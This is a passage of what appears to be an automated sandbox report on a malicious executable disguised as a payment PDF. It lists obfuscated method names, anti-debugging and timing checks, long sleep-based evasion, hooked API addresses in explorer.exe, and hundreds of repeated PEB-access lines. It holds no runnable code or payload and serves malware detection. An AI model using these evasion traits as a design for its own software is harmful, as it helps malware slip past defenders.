            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, SVDkUhBLLGiaL3Zguc.cs | High entropy of concatenated method names: 'zrx3hsUjAD', 'QTe3bY3D7G', 'cXk32asFeZ', 'nhI3IyA8xu', 'cZh3kMSg8h', 'Qyq3E6ARIP', 'O9j3tRGN6f', 'MBR3gjN2V0', 'z0Fjf1xuUTRgowbIeHH', 'iI0fp7xXxHQiyndJOAw'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.cs | High entropy of concatenated method names: 'Yt6ofm4K6L', 'ObfoYNiHkr', 'TBloGlK2vH', 'ksooM0XNdg', 'iFiorEhXWM', 'gjco3r2tpu', 'SNEov1HTuI', 'ptRoVdQlrJ', 'CpVoRH3cE3', 'YMMoZduy4J'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, uagZMlT2PRIcd5mHmc.cs | High entropy of concatenated method names: 'pP53fMfPhH', 'i4b3Gqo91k', 'glL3rh3CXW', 'Ppu3vxUSn7', 'Wop3V5ZkCn', 'KKArSeXIpo', 'RkdrwgUJFX', 'SCXrK18yog', 'miVrJe2sL1', 'aXhr4ICuDu'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, FaEFox84HGc74nOAsU.cs | High entropy of concatenated method names: 'dqmqccBDIZ', 'Pg1qtF2JXo', 'd4yqLsYyII', 'WD2qmThoOZ', 'I2Oqyo40GS', 'EKbqjo3tNr', 'HBMqQMxfwL', 'Rd9q9nrq1i', 'MeFq5xa4yG', 'cVNqB6ouG8'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, aONjcELFZUjJUNTQZU.cs | High entropy of concatenated method names: 'wbyCvZxAgt', 'STyCVKXv3y', 'suqCZcYZL6', 'zWjCpLiFdT', 'al2CaGpZrT', 'OOAClsVBdE', 'vBI8E9I2CZZELYyZi1', 'GYIJDI5TPD3typy6pQ', 'GCpCCe8u5W', 'PM0CoRf5ZR'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, JMdMrPaRA1fNwKBYnF.cs | High entropy of concatenated method names: 'NetiLesb88', 'n4Fim9Q3LG', 'Sbji1hs4GD', 'sKHiyhUHHg', 'OQki6e3DL4', 'YkSijt5L2w', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, daegRmAWcvMi7SAWgp.cs | High entropy of concatenated method names: 'XpWa5yeDsf', 'FkYaOayHxK', 'VsDa6RnfBF', 'LcNa0f2k8u', 'zUrammaW8I', 'HgIa1idsL0', 'okGayxkN4O', 'IjWajUktVV', 'H47aA7GGI6', 'UMlaQFwZYg'
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: swift_payment_pdf.exe PID: 7344, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: 14C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: 2EC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: 4EC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: 7ED0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: 8ED0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: 9090000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: A090000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: A400000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: B400000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: C400000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: D400000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: E400000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: F400000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: FAD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0139096E rdtsc 5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 2939
            Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 7033
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\explorer.exe | API coverage: 2.6 %
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe TID: 7364 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064 | Thread sleep count: 2939 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064 | Thread sleep time: -5878000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064 | Thread sleep count: 7033 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 8064 | Thread sleep time: -14066000s >= -30000s
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe TID: 8096 | Thread sleep time: -50000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F0BF90 FindFirstFileW,FindNextFileW,FindClose, 7_2_02F0BF90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Thread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000007.00000002.3553716151.0000000003209000.00000004.00000020.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3554351518.00000000006CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000009.00000002.2538395340.000002860C8BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\explorer.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0139096E rdtsc 5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00417A13 LdrLoadDll, 5_2_00417A13
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01380124 mov eax, dword ptr fs:[00000030h] 5_2_01380124
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01424164 mov eax, dword ptr fs:[00000030h] 5_2_01424164
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01424164 mov eax, dword ptr fs:[00000030h] 5_2_01424164
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FA118 mov ecx, dword ptr fs:[00000030h] 5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FA118 mov eax, dword ptr fs:[00000030h] 5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FA118 mov eax, dword ptr fs:[00000030h] 5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FA118 mov eax, dword ptr fs:[00000030h] 5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h] 5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01410115 mov eax, dword ptr fs:[00000030h] 5_2_01410115
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01356154 mov eax, dword ptr fs:[00000030h] 5_2_01356154
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01356154 mov eax, dword ptr fs:[00000030h] 5_2_01356154
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0134C156 mov eax, dword ptr fs:[00000030h] 5_2_0134C156
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E8158 mov eax, dword ptr fs:[00000030h] 5_2_013E8158
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h] 5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h] 5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E4144 mov ecx, dword ptr fs:[00000030h] 5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h] 5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h] 5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014161C3 mov eax, dword ptr fs:[00000030h] 5_2_014161C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014161C3 mov eax, dword ptr fs:[00000030h] 5_2_014161C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D019F mov eax, dword ptr fs:[00000030h] 5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D019F mov eax, dword ptr fs:[00000030h] 5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D019F mov eax, dword ptr fs:[00000030h] 5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D019F mov eax, dword ptr fs:[00000030h] 5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0134A197 mov eax, dword ptr fs:[00000030h] 5_2_0134A197
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0134A197 mov eax, dword ptr fs:[00000030h] 5_2_0134A197
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0134A197 mov eax, dword ptr fs:[00000030h] 5_2_0134A197
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014261E5 mov eax, dword ptr fs:[00000030h] 5_2_014261E5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01390185 mov eax, dword ptr fs:[00000030h] 5_2_01390185
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013F4180 mov eax, dword ptr fs:[00000030h] 5_2_013F4180
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013F4180 mov eax, dword ptr fs:[00000030h] 5_2_013F4180
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013801F8 mov eax, dword ptr fs:[00000030h] 5_2_013801F8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0140C188 mov eax, dword ptr fs:[00000030h] 5_2_0140C188
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0140C188 mov eax, dword ptr fs:[00000030h] 5_2_0140C188
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h] 5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov ecx, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6030 mov eax, dword ptr fs:[00000030h]5_2_013E6030
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A020 mov eax, dword ptr fs:[00000030h]5_2_0134A020
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C020 mov eax, dword ptr fs:[00000030h]5_2_0134C020
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D4000 mov ecx, dword ptr fs:[00000030h]5_2_013D4000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137C073 mov eax, dword ptr fs:[00000030h]5_2_0137C073
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352050 mov eax, dword ptr fs:[00000030h]5_2_01352050
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6050 mov eax, dword ptr fs:[00000030h]5_2_013D6050
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013480A0 mov eax, dword ptr fs:[00000030h]5_2_013480A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E80A8 mov eax, dword ptr fs:[00000030h]5_2_013E80A8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135208A mov eax, dword ptr fs:[00000030h]5_2_0135208A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C0F0 mov eax, dword ptr fs:[00000030h]5_2_0134C0F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013920F0 mov ecx, dword ptr fs:[00000030h]5_2_013920F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0134A0E3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013580E9 mov eax, dword ptr fs:[00000030h]5_2_013580E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D60E0 mov eax, dword ptr fs:[00000030h]5_2_013D60E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D20DE mov eax, dword ptr fs:[00000030h]5_2_013D20DE
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014160B8 mov eax, dword ptr fs:[00000030h]5_2_014160B8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014160B8 mov ecx, dword ptr fs:[00000030h]5_2_014160B8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0142634F mov eax, dword ptr fs:[00000030h]5_2_0142634F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141A352 mov eax, dword ptr fs:[00000030h]5_2_0141A352
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C310 mov ecx, dword ptr fs:[00000030h]5_2_0134C310
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01370310 mov ecx, dword ptr fs:[00000030h]5_2_01370310
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A30B mov eax, dword ptr fs:[00000030h]5_2_0138A30B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A30B mov eax, dword ptr fs:[00000030h]5_2_0138A30B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A30B mov eax, dword ptr fs:[00000030h]5_2_0138A30B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F437C mov eax, dword ptr fs:[00000030h]5_2_013F437C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov ecx, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov eax, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov ecx, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov eax, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov eax, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F8350 mov ecx, dword ptr fs:[00000030h]5_2_013F8350
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140C3CD mov eax, dword ptr fs:[00000030h]5_2_0140C3CD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348397 mov eax, dword ptr fs:[00000030h]5_2_01348397
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348397 mov eax, dword ptr fs:[00000030h]5_2_01348397
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348397 mov eax, dword ptr fs:[00000030h]5_2_01348397
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137438F mov eax, dword ptr fs:[00000030h]5_2_0137438F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137438F mov eax, dword ptr fs:[00000030h]5_2_0137438F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E388 mov eax, dword ptr fs:[00000030h]5_2_0134E388
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E388 mov eax, dword ptr fs:[00000030h]5_2_0134E388
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E388 mov eax, dword ptr fs:[00000030h]5_2_0134E388
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F0 mov eax, dword ptr fs:[00000030h]5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F0 mov eax, dword ptr fs:[00000030h]5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F0 mov eax, dword ptr fs:[00000030h]5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013863FF mov eax, dword ptr fs:[00000030h]5_2_013863FF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov eax, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov eax, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov ecx, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov eax, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F43D4 mov eax, dword ptr fs:[00000030h]5_2_013F43D4
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F43D4 mov eax, dword ptr fs:[00000030h]5_2_013F43D4
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D63C0 mov eax, dword ptr fs:[00000030h]5_2_013D63C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134823B mov eax, dword ptr fs:[00000030h]5_2_0134823B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140A250 mov eax, dword ptr fs:[00000030h]5_2_0140A250
